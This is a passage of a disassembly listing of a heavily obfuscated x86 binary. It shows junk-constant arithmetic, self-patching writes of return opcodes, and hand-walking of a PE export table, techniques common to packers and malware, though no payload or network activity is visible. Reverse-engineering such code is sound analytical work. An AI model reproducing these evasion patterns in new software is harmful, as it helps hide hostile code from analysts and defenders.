loc_45244D:				; CODE XREF: hvvrg7ie:loc_44CADFj
		push	edi
		push	0F651AC12h
		pop	edi
		add	edi, 0EB4F1D6Ah
		and	edi, 5D4A78B6h
		cmp	edi, 0EEC35E39h
		jmp	loc_459EBF
; ---------------------------------------------------------------------------
		push	edi
		push	51180271h
		pop	edi
		add	edi, 9F82090Eh
		rol	edi, 0Dh
		add	edi, 6F2E808Ah
		add	edi, ebp
		jmp	loc_44F64A

; =============== S U B	R O U T	I N E =======================================



sub_452488	proc near		; CODE XREF: hvvrg7ie:00453EDBj
					; sub_43A839:loc_455FB5p

arg_0		= dword	ptr  4
arg_10		= dword	ptr  14h

; FUNCTION CHUNK AT 00444E34 SIZE 00000006 BYTES

		xchg	eax, [esp-4+arg_0]

loc_45248B:				; CODE XREF: hvvrg7ie:0043F530j
		pop	eax
		xchg	edx, [esp+0]
		call	sub_453405
		call	sub_444E49
		add	esp, 10h
		xchg	edi, [esp+0]
		jmp	loc_444E34
sub_452488	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E063

loc_4524A4:				; CODE XREF: sub_43E063:loc_45B5BFj
		push	edx
		mov	edx, eax
		xchg	edx, [esp-4+arg_0]
		push	ecx
		push	offset sub_43CD49
		jmp	loc_459913
; END OF FUNCTION CHUNK	FOR sub_43E063
; ---------------------------------------------------------------------------

loc_4524B5:				; DATA XREF: sub_4422A8+D9AAo
		push	0B5C7AFA2h
		pop	edx
		xor	edx, 2F9C9CF2h
		js	loc_442D4B
		mov	ebx, edx
		push	5C5D03D4h
		jmp	loc_45B0C5
; ---------------------------------------------------------------------------
		mov	ebp, 982E8543h
		jmp	sub_443163
; ---------------------------------------------------------------------------

loc_4524DD:				; CODE XREF: hvvrg7ie:0044879Aj
		jz	loc_450795
		jnp	loc_446258
; START	OF FUNCTION CHUNK FOR sub_44C1F3

loc_4524E9:				; CODE XREF: sub_44C1F3:loc_43B5F1j
		add	eax, 10E5CEC3h
		add	eax, ebp
		add	eax, 12F6B77Ch
		mov	eax, [eax]
		jmp	loc_439EC7
; END OF FUNCTION CHUNK	FOR sub_44C1F3
; ---------------------------------------------------------------------------

loc_4524FE:				; CODE XREF: hvvrg7ie:00451E56j
		add	esp, 0FFFFFFCCh
		lea	eax, nullsub_16
		jmp	loc_4403CA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44059F

loc_45250C:				; CODE XREF: sub_44059F:loc_4418EBj
		xchg	ebx, [esp-4+arg_0]
		mov	edx, ebx
		pop	ebx
		pop	ebp
		jmp	loc_456838
; END OF FUNCTION CHUNK	FOR sub_44059F
; ---------------------------------------------------------------------------

loc_452518:				; CODE XREF: hvvrg7ie:0043F831j
		sbb	ecx, edx
		push	0DA914A86h
		pop	ecx
		jmp	loc_44AC38
; ---------------------------------------------------------------------------

loc_452525:				; CODE XREF: hvvrg7ie:loc_45154Fj
		jnz	near ptr dword_444824+10h
		jmp	loc_4459EE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451669

loc_452530:				; CODE XREF: sub_451669+2A1Fj
		xchg	edx, [esp+0]
		jmp	loc_452C0C
; END OF FUNCTION CHUNK	FOR sub_451669
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44191F

loc_452538:				; CODE XREF: sub_44191F:loc_44EB8Ej
		and	esi, 76CA9C7Fh
		xor	esi, 613FD1B0h
		add	esi, ebp
		add	esi, 0EA02B24Fh
		mov	esi, [esi]
		add	eax, esi
		jmp	loc_452D17
; END OF FUNCTION CHUNK	FOR sub_44191F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_43. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458F7F

loc_452556:				; CODE XREF: sub_458F7F-B1C7j
		jmp	sub_43A87E
; END OF FUNCTION CHUNK	FOR sub_458F7F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AB90

loc_45255B:				; CODE XREF: sub_44AB90-B7CFj
		jmp	loc_45B2BE
; END OF FUNCTION CHUNK	FOR sub_44AB90
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A6D7

loc_452560:				; CODE XREF: sub_44A6D7-2AD2j
		adc	edx, ecx
		pop	ecx
		jmp	loc_4411CA
; END OF FUNCTION CHUNK	FOR sub_44A6D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4417B1

loc_452568:				; CODE XREF: sub_4417B1-4822j
		push	eax
		cmp	eax, 0C64CCAE0h
		jmp	loc_454956
; END OF FUNCTION CHUNK	FOR sub_4417B1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449CC8

loc_452574:				; CODE XREF: sub_449CC8+5D13j
		add	esi, 858B3E76h
		cmp	ecx, 6B549A77h
		jmp	loc_446245
; END OF FUNCTION CHUNK	FOR sub_449CC8

; =============== S U B	R O U T	I N E =======================================



sub_452585	proc near		; CODE XREF: hvvrg7ie:0043F536j
					; sub_43D531:loc_440CFDp

; FUNCTION CHUNK AT 004400B7 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00446B00 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044D7DE SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044DA98 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00452787 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454F44 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00455D43 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459874 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		jnz	loc_446B08
		mov	eax, [ebp+8]
		mov	eax, [eax-8]
		or	eax, 8
		or	eax, 10h
		mov	edx, [ebp+8]
		jmp	loc_446B00
sub_452585	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453BBD

loc_4525A3:				; CODE XREF: sub_453BBD+7983j
		jl	loc_448A3F

loc_4525A9:				; CODE XREF: hvvrg7ie:0044BD45j
		jmp	loc_446E50
; END OF FUNCTION CHUNK	FOR sub_453BBD
; ---------------------------------------------------------------------------
		add	ecx, ebx
		mov	[ecx], edx
		jmp	loc_448A3C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_4525B7:				; CODE XREF: sub_43F227-7A7j
		push	edi

loc_4525B8:				; CODE XREF: sub_43F227:loc_45032Ej
		lea	eax, [ebp-25Ch]
		cmp	dword ptr [eax], 47424454h
		jnz	loc_4395B8
		jmp	loc_44AA6B
; END OF FUNCTION CHUNK	FOR sub_43F227
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_171. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_4525D0:				; CODE XREF: sub_43F227+14DB5j
		jmp	loc_43B1BD
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44059F

loc_4525D5:				; CODE XREF: sub_44059F+6D05j
		jmp	loc_4419E6
; END OF FUNCTION CHUNK	FOR sub_44059F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A4C9

loc_4525DA:				; CODE XREF: sub_45A4C9-19EF7j
		jmp	loc_43F071
; END OF FUNCTION CHUNK	FOR sub_45A4C9
; ---------------------------------------------------------------------------

loc_4525DF:				; CODE XREF: hvvrg7ie:0043E626j
		jmp	locret_44FEEF
; ---------------------------------------------------------------------------
		add	edi, esi
		jmp	sub_452D54
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E60A

loc_4525EB:				; CODE XREF: sub_43E60A:loc_44CF9Aj
		xchg	edi, [esp+0]
		mov	ebp, edi
		pop	edi
		retn
; END OF FUNCTION CHUNK	FOR sub_43E60A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B6A5

loc_4525F2:				; CODE XREF: sub_43B6A5+12AECj
		jmp	loc_446466
; END OF FUNCTION CHUNK	FOR sub_43B6A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F98C

loc_4525F7:				; CODE XREF: sub_43F98C-2774j
		jmp	nullsub_156
; END OF FUNCTION CHUNK	FOR sub_43F98C

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4525FC	proc near		; CODE XREF: sub_44241C+Dj
					; sub_448ECC-3405p ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043AC8F SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043EECF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453124 SIZE 00000022 BYTES

		push	esi
		mov	esi, ebp
		xchg	esi, [esp+0]
		mov	ebp, esp
		jmp	loc_43EECF
sub_4525FC	endp


; =============== S U B	R O U T	I N E =======================================



sub_452609	proc near		; CODE XREF: sub_4522F8:loc_450DA3p
					; hvvrg7ie:0045B484j
		xchg	edi, [esp+0]
		pop	edi
		cmp	edx, 7C61090Eh
		jmp	loc_44AEB4
sub_452609	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449D53

loc_452618:				; CODE XREF: sub_449D53:loc_449D56j
		mov	ebx, [eax+18h]
		mov	ecx, [ebx+3Ch]
		mov	ecx, [ebx+ecx+78h]
		or	ecx, ecx
		jz	loc_44AEBA
		jmp	loc_4429E5
; END OF FUNCTION CHUNK	FOR sub_449D53
; ---------------------------------------------------------------------------
		ror	ecx, 15h
		jmp	sub_44A705

; =============== S U B	R O U T	I N E =======================================



sub_452637	proc near		; CODE XREF: sub_44E3B3:loc_43F289j
					; hvvrg7ie:004404B0p

; FUNCTION CHUNK AT 0043EC2F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EFCD SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044034F SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044AD04 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044D4E7 SIZE 00000008 BYTES

		xchg	esi, [esp+0]
		pop	esi
		xor	eax, 0A431C416h
		push	edi
		pushf
		push	198DDA9Ch
		jmp	loc_43EFCD
sub_452637	endp


; =============== S U B	R O U T	I N E =======================================



sub_45264D	proc near		; DATA XREF: hvvrg7ie:0043ECF1o
		add	eax, 32DBC0C7h
		push	offset loc_44E3C2
		jmp	nullsub_528
sub_45264D	endp


; =============== S U B	R O U T	I N E =======================================



sub_45265D	proc near		; CODE XREF: sub_44CB64-67C4p
					; hvvrg7ie:0044A29Fj

; FUNCTION CHUNK AT 0043B11B SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00442CC8 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004505A2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004550F3 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		cmp	eax, [edx+18h]
		jnb	loc_441488
		jmp	loc_4505A2
sub_45265D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_45266F:				; CODE XREF: sub_43F227+1012j
		jl	loc_44B28B
		or	ebx, edi
		jmp	loc_4550AA
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4512A0

loc_45267C:				; CODE XREF: sub_4512A0:loc_455BB7j
		push	0F1BD7A27h
		xchg	ebx, [esp+0]
		mov	eax, ebx
		pop	ebx
		sub	eax, 97814205h
		or	eax, 0E9985C1Fh
		add	eax, 4892C89h
		jmp	loc_44D543
; END OF FUNCTION CHUNK	FOR sub_4512A0
; ---------------------------------------------------------------------------

loc_45269E:				; CODE XREF: hvvrg7ie:0044A6F0j
					; hvvrg7ie:0045A550j
		push	ebp

; =============== S U B	R O U T	I N E =======================================



sub_45269F	proc near		; CODE XREF: sub_454789-3482p
		xchg	ecx, [esp+0]
		pop	ecx
		pop	ebx
		lea	eax, nullsub_23
		call	sub_44475F

loc_4526AF:				; CODE XREF: hvvrg7ie:00446756j
		jmp	loc_43FA45
sub_45269F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_4526B4:				; CODE XREF: hvvrg7ie:loc_459728j
		push	offset loc_4462E2
		jmp	locret_43ADDC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445D53

loc_4526BE:				; CODE XREF: sub_445D53:loc_445D59j
		push	edi
		mov	edi, offset loc_4402FF
		jmp	loc_454659
; END OF FUNCTION CHUNK	FOR sub_445D53
; ---------------------------------------------------------------------------

loc_4526C9:				; CODE XREF: hvvrg7ie:0044636Aj
		jnp	loc_4521E8

; =============== S U B	R O U T	I N E =======================================



sub_4526CF	proc near		; CODE XREF: sub_44A6D7-9504p

arg_0		= dword	ptr  4

		xchg	edi, [esp+0]
		pop	edi
		push	0F79F384Ah
		pop	esi
		xor	esi, 0A6E74B3h
		add	esi, 2535D0Ah
		xchg	esi, [esp-4+arg_0]
		jmp	sub_451703
sub_4526CF	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44290B

loc_4526ED:				; CODE XREF: sub_44290B-8774j
		pop	edi
		lea	eax, loc_43FA45
		mov	byte ptr [eax],	0C3h
		jmp	loc_4560A4
; END OF FUNCTION CHUNK	FOR sub_44290B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451D60

loc_4526FC:				; CODE XREF: sub_451D60-1231Aj
		mov	eax, [esp+0]
		push	edx
		jmp	loc_443BB7
; END OF FUNCTION CHUNK	FOR sub_451D60
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4484E1

loc_452705:				; CODE XREF: hvvrg7ie:0043C9C9j
					; sub_4484E1+5839j
		and	eax, 0C4A3A39Bh
		add	eax, 0CAB7FD8Ah
		add	eax, ebp
		push	esi
		jmp	loc_43E52C
; END OF FUNCTION CHUNK	FOR sub_4484E1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44059F

loc_452719:				; CODE XREF: sub_44059F+2816j
		jp	loc_444C5D
		or	eax, edx
		sub	ebp, 522BA7A9h
		or	eax, 359315B1h
		jmp	loc_44BB1F
; END OF FUNCTION CHUNK	FOR sub_44059F
; ---------------------------------------------------------------------------

loc_452732:				; CODE XREF: hvvrg7ie:00443DA1j
		jg	loc_4529CA
		cmp	ecx, eax
		jmp	loc_45A041
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449CC8

loc_45273F:				; CODE XREF: sub_449CC8:loc_457C8Cj
		jz	loc_449EA4
		jmp	loc_43DF56
; END OF FUNCTION CHUNK	FOR sub_449CC8
; ---------------------------------------------------------------------------
		and	edi, 694CD06Ah
		jmp	sub_43AA2D
; ---------------------------------------------------------------------------

loc_452755:				; CODE XREF: hvvrg7ie:0043CBF0j
		cmp	edx, 53EC0453h
		jmp	loc_44A90E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_333. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A234

loc_452761:				; CODE XREF: sub_45A234-165E1j
		jmp	loc_459A03
; END OF FUNCTION CHUNK	FOR sub_45A234
; ---------------------------------------------------------------------------
		push	0F15F42F9h
		pop	ebx
		and	ebx, 0FC2823Ah
		sub	ebx, 0CAFBB36Fh
; START	OF FUNCTION CHUNK FOR sub_4500FA

loc_452778:				; CODE XREF: sub_4500FA:loc_43E498j
		rol	ebx, 0Ch
		add	ebx, 9B553D40h
		jmp	loc_457C1C
; END OF FUNCTION CHUNK	FOR sub_4500FA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_131. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452585

loc_452787:				; CODE XREF: sub_452585-BA6Cj
		jmp	loc_4400B7
; END OF FUNCTION CHUNK	FOR sub_452585

; =============== S U B	R O U T	I N E =======================================



sub_45278C	proc near		; CODE XREF: sub_44D2F8:loc_4474D7j

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043A4BF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EA8F SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00451628 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0045289E SIZE 00000014 BYTES

		push	ebx
		push	0D9FA059Fh
		mov	ebx, ebp
		jmp	loc_43A4BF
sub_45278C	endp

; ---------------------------------------------------------------------------

loc_452799:				; CODE XREF: hvvrg7ie:loc_444E9Dj
					; hvvrg7ie:0045A38Ej
		mov	byte ptr [eax],	0C3h
		jmp	loc_4501E7

; =============== S U B	R O U T	I N E =======================================



sub_4527A1	proc near		; CODE XREF: sub_41088C+78p
					; hvvrg7ie:0043D63Ej
					; DATA XREF: ...

var_C		= dword	ptr -0Ch

; FUNCTION CHUNK AT 0043C943 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EF5B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004416DD SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00442166 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044327D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445E57 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00446343 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004493A5 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044A014 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C552 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044D7F0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044DE4A SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00453881 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004545CF SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00454757 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456214 SIZE 0000000A BYTES

		push	edx
		push	0E70C46DAh
		pop	edx
		add	edx, 1EF0B607h
		rol	edx, 1
		sub	edx, 36123F1Fh
		jmp	loc_453881
sub_4527A1	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453422

loc_4527BB:				; CODE XREF: sub_453422+7FD8j
		xchg	ebx, [esp+0]
		mov	eax, ebx
		pop	ebx

loc_4527C1:				; CODE XREF: hvvrg7ie:loc_44A79Fj
		add	eax, 71B1BA2Eh
		js	loc_444C44
; END OF FUNCTION CHUNK	FOR sub_453422
; START	OF FUNCTION CHUNK FOR sub_44059F

loc_4527CD:				; CODE XREF: sub_44059F+12B3Cj
		jmp	loc_43DF6B
; END OF FUNCTION CHUNK	FOR sub_44059F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B07D

loc_4527D2:				; CODE XREF: sub_45B07D-B72Fj
		jmp	nullsub_451
; END OF FUNCTION CHUNK	FOR sub_45B07D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ABA3

loc_4527D7:				; CODE XREF: sub_44ABA3+Aj
		jmp	loc_43DA57
; END OF FUNCTION CHUNK	FOR sub_44ABA3
; ---------------------------------------------------------------------------

loc_4527DC:				; CODE XREF: hvvrg7ie:loc_44481Fj
		jmp	loc_4482C2
; ---------------------------------------------------------------------------
		or	ebx, eax
		pushf
		jmp	loc_453D7A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453EFC

loc_4527E9:				; CODE XREF: sub_453EFC:loc_44089Aj
		and	edx, 171A3BACh
		add	edx, 7C188BA0h
		jnz	loc_458C8D

loc_4527FB:				; CODE XREF: hvvrg7ie:00453B55j
		jmp	loc_4522CE
; END OF FUNCTION CHUNK	FOR sub_453EFC
; ---------------------------------------------------------------------------
		sbb	ecx, esi
		cdq
		jnz	loc_447A44
		jmp	loc_458C8B
; ---------------------------------------------------------------------------
		sub	eax, ebp
		jmp	sub_44DB2D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452238

loc_452815:				; CODE XREF: sub_452238:loc_43969Ej
		push	eax
		pop	edx
		xchg	edx, [esp+0]
		call	dword ptr [ebp-4]
; END OF FUNCTION CHUNK	FOR sub_452238
; START	OF FUNCTION CHUNK FOR sub_44FA76

loc_45281D:				; CODE XREF: hvvrg7ie:0043A3B7j
					; sub_44FA76:loc_44D04Fj
		mov	esp, ebp
		xchg	edi, [esp+0]
		jmp	loc_43BA85
; END OF FUNCTION CHUNK	FOR sub_44FA76
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_452827:				; CODE XREF: sub_450434:loc_439BDFj
		mov	eax, [ebp-20h]
		call	sub_456EAC

loc_45282F:				; CODE XREF: sub_443086+92A3j
		jmp	loc_4572B8
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_452834:				; CODE XREF: sub_44D2F8+AA53j
		sbb	ebx, 6B4E40E8h
		test	esi, edx
		jmp	loc_4488B4
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443BCD

loc_452841:				; CODE XREF: sub_443BCD:loc_450F3Cj
		mov	byte ptr [eax],	0C3h
		jmp	loc_45B5B0
; END OF FUNCTION CHUNK	FOR sub_443BCD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F98C

loc_452849:				; CODE XREF: sub_43F98C+6j
		mov	eax, [esp+0]
		push	offset loc_458ED0
		jmp	loc_4501DD
; END OF FUNCTION CHUNK	FOR sub_43F98C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448663

loc_452856:				; CODE XREF: sub_448663+95D5j
		or	ecx, 0EF5880Bh
		add	ecx, 83CFC7D7h
		or	ecx, 0CE97D3B8h
		push	offset loc_44E760
		jmp	nullsub_203
; END OF FUNCTION CHUNK	FOR sub_448663
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456CD4

loc_452872:				; CODE XREF: sub_456CD4:loc_4447A7j
		pop	edi
		popf
		call	sub_44E4A0

loc_452879:				; CODE XREF: hvvrg7ie:0044D316j
		jmp	sub_44E04C
; END OF FUNCTION CHUNK	FOR sub_456CD4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443695

loc_45287E:				; CODE XREF: sub_443695+Aj
		jmp	loc_43C271
; END OF FUNCTION CHUNK	FOR sub_443695
; ---------------------------------------------------------------------------
		xor	ecx, edx
		jmp	loc_456FE1
; ---------------------------------------------------------------------------

loc_45288A:				; CODE XREF: hvvrg7ie:00456E8Dj
		mov	byte ptr [eax],	0C3h
		call	sub_44E0C0
; START	OF FUNCTION CHUNK FOR sub_44D8CE

loc_452892:				; CODE XREF: sub_44D8CE+7j
		jmp	loc_44BECC
; END OF FUNCTION CHUNK	FOR sub_44D8CE
; ---------------------------------------------------------------------------
		cmp	ecx, ebx
		jmp	loc_440044
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45278C

loc_45289E:				; CODE XREF: sub_45278C-114Bj
		jz	loc_43EA95
		rol	ebx, 3
		cmp	ebp, 0C5AEC038h
		jmp	loc_43EA8F
; END OF FUNCTION CHUNK	FOR sub_45278C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440643

loc_4528B2:				; CODE XREF: sub_440643:loc_450687j
		xchg	esi, [esp+0Ch+var_C]

loc_4528B5:				; CODE XREF: hvvrg7ie:0045924Fj
		mov	ebp, esi
		pop	esi
		mov	eax, ds:dword_45A8B4
		or	eax, eax
		jnz	loc_4508FA
		jmp	loc_4437F7
; END OF FUNCTION CHUNK	FOR sub_440643
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4551B7

loc_4528CB:				; CODE XREF: sub_4551B7+18j
		jz	loc_43BEC7
		cdq
		jmp	loc_43BEC4
; END OF FUNCTION CHUNK	FOR sub_4551B7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456FF3

loc_4528D7:				; CODE XREF: sub_456FF3+2A7Aj
		ror	esi, 0Ah
		adc	esi, ecx

loc_4528DC:				; CODE XREF: sub_4498FB:loc_452047j
					; sub_4498FB+936Bj ...
		pop	ecx
		xchg	eax, [esp-4+arg_0]
		push	eax
		pop	ebp
		pop	eax
		jmp	loc_4455DE
; END OF FUNCTION CHUNK	FOR sub_456FF3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_4528E8:				; CODE XREF: sub_454099:loc_4426BFj
		or	eax, 6C306D1Eh
		add	ebx, 0B23C54D7h
		jmp	loc_459117
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------

loc_4528F9:				; CODE XREF: hvvrg7ie:loc_44BADBj
		add	edx, offset byte_470C83
		push	offset loc_43D95C
		jmp	loc_43BE2B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B7CB

loc_452909:				; CODE XREF: sub_44B7CB-4B73j
		jnz	loc_459853
		jmp	loc_449015
; END OF FUNCTION CHUNK	FOR sub_44B7CB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_136. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_452915:				; CODE XREF: hvvrg7ie:0045AC34j
		jmp	loc_459E56
; ---------------------------------------------------------------------------
		popf
		jmp	loc_452F0C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452AE5

loc_452920:				; CODE XREF: sub_452AE5+Aj
		mov	esp, ebp
		pop	ebp
		mov	eax, ds:dword_439C98
		or	eax, eax
		jnz	loc_4487E6
		jmp	loc_4545A3
; END OF FUNCTION CHUNK	FOR sub_452AE5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448100

loc_452936:				; CODE XREF: sub_448100-7606j
		xchg	ecx, [ebp+0]
		jmp	loc_44CFD0
; END OF FUNCTION CHUNK	FOR sub_448100
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4425F0

loc_45293E:				; CODE XREF: sub_4425F0+9j
		mov	eax, ecx
		xchg	eax, [esp+4+var_4]
		push	ecx
		mov	ecx, edx
		xchg	ecx, [esp+8+var_8]
		push	0B2767B9Eh
		jmp	loc_454293
; END OF FUNCTION CHUNK	FOR sub_4425F0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E4A6

loc_452953:				; CODE XREF: sub_44E4A6:loc_43A7B0j
		push	0FC3067DFh
		pop	ebx
		rol	ebx, 1
		or	ebx, 5A98C8CEh
		xor	ebx, 4DBEFB7Ah
		jmp	loc_43C26C
; END OF FUNCTION CHUNK	FOR sub_44E4A6
; ---------------------------------------------------------------------------
		sub	edi, 297C67EDh
		test	eax, ebx
		jmp	loc_444577
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C8C7

loc_452979:				; CODE XREF: sub_44C8C7-488j
		rol	edi, 1
		add	edi, 9F665777h
		popf
		adc	ebx, edi
		jmp	loc_44E98C
; END OF FUNCTION CHUNK	FOR sub_44C8C7
; ---------------------------------------------------------------------------

loc_452989:				; CODE XREF: hvvrg7ie:004566F9j
		jl	loc_43DFC3

; =============== S U B	R O U T	I N E =======================================



sub_45298F	proc near		; CODE XREF: sub_444363+11495p
		xchg	edx, [esp+0]
		pop	edx
		mov	eax, [ebp-8]
		mov	al, [eax]
		add	[ebp-0Ah], al
		xor	eax, eax
		jmp	loc_44F250
sub_45298F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45038B

loc_4529A2:				; CODE XREF: sub_45038B-8FF1j
		jg	loc_43921F
		shl	edi, 11h
; END OF FUNCTION CHUNK	FOR sub_45038B
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_4529AB:				; CODE XREF: sub_45038B:loc_448C1Fj
					; sub_4465A6:loc_451D0Ej ...
		jmp	nullsub_124
; ---------------------------------------------------------------------------

loc_4529B0:				; CODE XREF: sub_45038B-1890j
					; sub_43F227+F9A4j
		pop	ecx
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C811

loc_4529B3:				; CODE XREF: sub_43C811+16C5j
		shl	eax, 4
		mov	[eax], edx
		or	esi, 69E3F0F6h

loc_4529BE:				; CODE XREF: sub_43C811:loc_44B6B5j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_4503DA

loc_4529CA:				; CODE XREF: hvvrg7ie:loc_452732j
		jmp	loc_446D4F
; END OF FUNCTION CHUNK	FOR sub_43C811
; ---------------------------------------------------------------------------

locret_4529CF:				; CODE XREF: hvvrg7ie:0044D11Fj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440643

loc_4529D0:				; CODE XREF: sub_440643+16239j
		jmp	loc_44D0C4
; END OF FUNCTION CHUNK	FOR sub_440643
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45028F

loc_4529D5:				; CODE XREF: sub_45028F-C824j
		jmp	sub_4538F3
; END OF FUNCTION CHUNK	FOR sub_45028F
; ---------------------------------------------------------------------------
		push	ecx
		call	sub_443B77
; START	OF FUNCTION CHUNK FOR sub_458F33

loc_4529E0:				; CODE XREF: sub_458F33-100Bj
